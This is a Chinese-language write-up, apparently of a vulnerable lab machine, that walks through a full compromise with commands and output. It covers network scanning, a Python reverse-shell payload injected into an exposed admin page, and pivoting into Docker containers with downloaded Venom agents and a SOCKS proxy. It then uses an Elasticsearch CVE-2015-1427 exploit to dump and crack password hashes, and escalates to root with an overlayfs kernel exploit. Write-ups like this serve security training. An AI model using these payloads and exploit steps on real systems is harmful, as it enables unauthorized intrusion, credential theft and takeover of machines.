● 主机发现
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:3e:92:fb, IPv4: 192.168.10.100
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.10.1 00:50:56:ff:c4:ee VMware, Inc.
192.168.10.2 00:50:56:c0:00:08 VMware, Inc.
192.168.10.15 00:0c:29:74:e0:7d VMware, Inc.
192.168.10.254 00:50:56:f1:51:7f VMware, Inc.
● 端口服务扫描
┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.10.15
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-10 02:17 EST
Nmap scan report for 192.168.10.15
Host is up (0.00064s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
MAC Address: 00:0C:29:74:E0:7D (VMware)
┌──(root㉿kali)-[~]
└─# nmap -p22,5000 -sC -sV 192.168.10.15
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)
| 2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)
| 256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)
|_ 256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
|_http-title: Leave a message
MAC Address: 00:0C:29:74:E0:7D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
● web信息收集
用浏览器访问http://192.168.10.15:5000,但在页面上并没有发现有用的信息
对http://192.168.10.15:5000进行目录扫描,发现一个隐藏目录admin
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.10.15:5000
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Target: http://192.168.10.15:5000/
[02:27:15] Starting:
[02:27:20] 200 - 401B - /admin
Task Completed
浏览器访问http://192.168.10.15:5000/admin,发现可以执行命令
● 代码注入
使用Python反弹shell,这段代码将使用!先nc在Kali主机上监听TCP5555端口
在http://192.168.10.15:5000/admin输入Python Shell
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.100",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
● 反弹shell
┌──(root㉿kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 40592
/app #
/app # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),
20(dialout),26(tape),27(video)
/app # whoami
root
/app # ls
Dockerfile
main.py
requirements.txt
templates
/app #
● 信息搜集
发现收到Shell为docker主机的root权限,但发现处于容器环境中
Tip:判断主机为Docker容器的两种方法:
方法一:确认根目录下是否存在.dockerenv文件
ls /.dockerenv
方法二:查看/proc/1/cgroup是否存在docker目录
cat /proc/1/cgroup
/app # ls /.dockerenv
/.dockerenv
/app # cat /proc/1/cgroup
11:hugetlb:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
10:perf_event:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
9:blkio:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
8:freezer:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
7:devices:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
6:memory:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
5:cpuacct:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
4:cpu:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
3:cpuset:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
2:name=systemd:/docker/d260a2a3a558b9648b60961fea6e63b6a596349811e309be6bb112148115e400
/app #
内网主机扫描结果,发现172.17.0.1,172.17.0.2,172.17.0.3为存活主机
/app # for i in $(seq 1 254); do ping -c 1 172.17.0.$i; done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.044 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.044/0.044/0.044 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.035 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.035/0.035/0.035 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
● 内网穿透
部署Venom内网穿透工具
Kali主机Venom目录启动Python3 Http Server,将Venom中的代理端程序传给目标靶机
python3 -m http.server 80
┌──(root㉿kali)-[~/桌面/venom]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.10.15 - - [10/Feb/2023 03:01:33] "GET /agent_linux_x64 HTTP/1.1" 200 -
启动Venom管理端,监听本地9999端口
./admin_linux_x64 -lport 9999
┌──(root㉿kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.10.15:36290
[+]A new node connect to admin node success 客户端成功上线
靶机端安装客户端64位版本
cd /tmp
wget -c http://192.168.10.100/agent_linux_x64
chmod +x agent_linux_x64
./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
客户端成功上线
┌──(root㉿kali)-[~]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.10.100] from (UNKNOWN) [192.168.10.15] 58313
/app #
/app # cd /tmp
/tmp # ls
/tmp #
/tmp # wget -c http://192.168.10.100/agent_linux_x64
Connecting to 192.168.10.100 (192.168.10.100:80)
agent_linux_x64 100% |*******************************| 3791k 0:00:00 ETA
/tmp # ls
agent_linux_x64
/tmp # chmod +x agent_linux_x64
/tmp # ./agent_linux_x64 -rhost 192.168.10.100 -rport 9999
2023/02/10 08:02:03 [+]Successfully connects to a new node
客户端成功上线
查看、控制Venom节点、启动socks隧道
┌──(root㉿kali)-[~/桌面/venom]
└─# ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.10.15:36290
[+]A new node connect to admin node success 客户端成功上线
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1 进入客户端
node 1
(node 1) >>> socks 1080 在客户端开socks端口,用1080端口代理服务端流量到内网网段
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
venom服务器(KALI)挂Socks对内网进行扫描
为实现用kali的强大功能对内网网段进行渗透,
需修改proxychains配置:使用sock5服务,启用本地1080端口转发kali发向内网的流量
vi /etc/proxychains4.conf
修改最后一行为:
socks5 127.0.0.1 1080
sudo proxychains nmap -Pn -sT -sV 172.17.0.1
Nmap scan report for 172.17.0.1 的结果
Host is up (0.0096s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo proxychains nmap -Pn -sT -sV 172.17.0.2
Nmap scan report for 172.17.0.2 的结果
Host is up (0.0063s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
9200/tcp open http Elasticsearch REST API 1.4.2 (name: Ka-Zar; cluster: elasticsearch; Lucene 4.10.2)
sudo proxychains nmap -Pn -sT -sV 172.17.0.3
sudo proxychains nmap -Pn -sT -sV 172.17.0.3 的结果
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:5000 ... OK
Nmap scan report for 172.17.0.3
Host is up (0.0095s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
5000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15)
● 漏洞利用
利用Elasticsearch漏洞获取目标靶机登录用户名和密码
┌──(root㉿kali)-[~/桌面/venom]
└─# searchsploit elasticsearch
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
ElasticSearch - Remote Code Execution | linux/remote/36337.py
ElasticSearch - Remote Code Execution | multiple/webapps/33370.html
ElasticSearch - Search Groovy Sandbox Bypass (Metaspl | java/remote/36415.rb
ElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.py
ElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.py
ElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.py
ElasticSearch Dynamic Script - Arbitrary Java Executi | java/remote/33588.rb
Elasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[~/桌面/venom]
└─# cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
┌──(root㉿kali)-[~/桌面/venom]
└─# sudo proxychains python2 36337.py 172.17.0.2
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓
▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒
▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░
▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░
░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒
░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░
░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░
░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░
Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1
{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something
~$ cat passwords
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
~$ id
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK
uid=0(root) gid=0(root) groups=0(root)
● 密码破解
john:3f8184a7343664553fcb5337a3138814
1337hack
test:861f194e9d6118f3d942a72be3e51749
1234test
admin:670c3bbc209a18dde5446e5e6c1f1d5b
1111pass
root:b3d34352fc26117979deabdf1b9b6354
1234pass
jane:5c158b60ed97c723b673529b8a3cf72b
1234jane
● 本地提权
通过依次尝试,john:1337hack可以登录目标靶机
┌──(root㉿kali)-[~/桌面/venom]
└─# ssh john@192.168.10.15
john@192.168.10.15's password:
Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)
* Documentation: https://help.ubuntu.com/
System information as of Fri Feb 10 11:18:26 EST 2023
System load: 0.0 Processes: 390
Usage of /: 12.8% of 14.64GB Users logged in: 0
Memory usage: 5% IP address for eth0: 192.168.10.15
Swap usage: 0%
Graph this data and manage this system at:
https://landscape.canonical.com/
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Sun Oct 28 22:36:16 2018 from 10.0.0.8
john@socnet:~$
john@socnet:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@socnet:~$ whoami
john
john@socnet:~$
john用户提权失败,
john@socnet:~$ sudo -s
[sudo] password for john:
john is not in the sudoers file. This incident will be reported.
尝试内核提权
john@socnet:~$ uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
john@socnet:~$
找漏洞利用代码
──(root㉿kali)-[~/桌面/venom]
└─# searchsploit linux 3.13.0 ubuntu
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/ | linux/local/37293.txt
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - | linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X8 | linux/local/31346.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket | linux/dos/43234.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Lo | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pri | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfilt | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/16 | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / L | linux/local/47169.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via Us | linux/local/41760.txt
------------------------------------------------------ ---------------------------------
Shellcodes: No Results
但是靶机没有安装gcc
john@socnet:~$ gcc -v
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
john@socnet:~$
且查看37292.c脚本发现,还需编译ofs-lib.so文件。所以考虑把ofs-lib.so文件从lib文件复制出,并注释掉37292.c相关代码再便宜,并将编译后的文件和ofs-lib.so共同上传目标靶机
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# vim 37292.c
注释掉相关代码
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# locate ofs-lib.so
/usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so
查找ofs-lib.so文件位置
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# gcc -o exp 37292.c
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# ls
36337.py 37292.c exp ofs-lib.so
编译好的exp和ofs-lib.so上传至目标靶机
kali启动http server
┌──(root㉿kali)-[~/桌面/venom/bbbb]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
靶机
在靶机上下载exp和ofs-lib.so
cd /tmp
wget http://192.168.10.100/exp
wget http://192.168.10.100/ofs-lib.so
john@socnet:/tmp$ ls
exp ofs-lib.so
john@socnet:/tmp$
john@socnet:/tmp$ chmod +x exp
john@socnet:/tmp$ ./exp
./exp: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exp)
尴尬了,执行不了。。。。
只能试试老方法了,但是不切合实战要求
就是给靶机安装好gcc和g++
然后把.c源文件上传到靶机里,在靶机里编译好后执行。
john@socnet:/tmp$ gcc 37292.c
john@socnet:/tmp$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
# id
uid=0(root) gid=0(root) groups=0(root),1001(john)
# whoami
root
# ls -al
total 56
drwxrwxrwt 3 root root 4096 Feb 10 07:29 .
drwxr-xr-x 22 root root 4096 Oct 27 2018 ..
-rwxrwxr-x 1 john john 4975 Feb 10 06:54 37292.c
-rwxrwxr-x 1 john john 13652 Feb 10 07:29 a.out
-rwxrwxr-x 1 john john 16936 Feb 10 06:54 exp
drwxr-xr-x 2 root root 4096 Feb 10 07:23 gcc
# pwd
/tmp
#
网友评论